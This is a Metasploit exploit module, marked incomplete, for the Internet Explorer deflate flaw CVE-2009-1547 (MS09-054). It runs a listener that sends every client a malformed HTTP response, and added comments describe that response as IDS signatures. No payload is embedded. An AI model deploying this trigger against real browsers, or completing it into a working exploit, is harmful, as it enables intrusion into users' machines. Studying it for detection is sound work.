##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

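#
# TCP listener that answers every inbound client with one fixed, malformed
# HTTP response tied to CVE-2009-1547 / MS09-054 (deflate processing in
# Internet Explorer). The module name is tagged [INCOMPLETE]: the response
# sent by on_client_data has no body, and the configured payload is never
# placed into it.
#
# Defensive notes, all read directly from the response literal below:
#   * the status line is "HTTP " with no protocol version or status code;
#   * header lines are terminated with a bare LF, not CRLF;
#   * Content-Encoding is "deflate" although no compressed body follows;
#   * Content-Range is present with an empty value.
# Each of these is a usable signature when inspecting server responses at a
# proxy or IDS. MS09-054 (listed under References) is the vendor bulletin for
# this issue.
#
class MetasploitModule < Msf::Exploit::Remote

	# Raw TCP server mixin: the module speaks "HTTP" by hand instead of using
	# the framework's HttpServer, so no request parsing or routing happens.
	include Msf::Exploit::Remote::TcpServer

=begin
	#
	# BrowserAutopwn is no good for TcpServer modules. Must be HttpServer or derived...
	#
	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:vuln_test  => nil, # no way to test without just trying it
		:rank       => NormalRanking  # reliable memory corruption
	})
=end

	#
	# Registers the module metadata and the listener port option.
	#
	# @param info [Hash] metadata supplied by the framework; merged with the
	#   values below through update_info.
	#
	def initialize(info = {})
		super(update_info(info,
			# The "[INCOMPLETE]" prefix is the author's own status marker.
			'Name'           => '[INCOMPLETE] Microsoft Internet Explorer Deflate Memory Corruption',
			'Description'    => %q{
				This module exploits a vulnerability in the deflate processing code
			of Internet Explorer.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm'
				],
			'Version'        => '$Revision$',
			# Identifiers a defender can use to look up the advisory and patch.
			'References'     =>
				[
					['CVE', '2009-1547'],
					['MSB', 'MS09-054'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			# Payload constraints are declared here, but note that
			# on_client_data never embeds a payload in what it sends.
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'Compat'   =>
						{
							# Leading '-' excludes this connection type
							# (framework convention; the socket is closed
							# right after the response is written).
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Single target with no target-specific settings.
					[ 'Automatic', { }],
				],
			# NOTE(review): confirm this date against the publication date
			# of the MS09-054 bulletin referenced above.
			'DisclosureDate' => 'Nov 10 2009',
			'DefaultTarget'  => 0))

		# SRVPORT is required and defaults to 8090.
		register_options([
			OptPort.new('SRVPORT', [true, 'The listening HTTP service port', 8090])
		], self.class)
	end

	#
	# Callback invoked when a connected client has sent data. The request is
	# read and thrown away, then the same fixed response is written for every
	# client regardless of what was asked for.
	#
	# @param cli the connected client socket handed over by TcpServer
	#
	def on_client_data(cli)
		# Drain the pending request; its content is never inspected, so the
		# result is not kept. Arguments are presumably (length, timeout in
		# seconds) per the Rex socket API -- confirm.
		cli.get_once(-1, 5)

		print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
		# The whole response: a truncated status line, a deflate
		# Content-Encoding header, an empty Content-Range header, LF-only line
		# endings, and no body. Despite the log message above, no HTML is sent.
		cli.put("HTTP \nContent-Encoding:deflate\nContent-Range:\n\n")
		cli.close
		# Called after the client socket has already been closed.
		handler(cli)
	end
end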

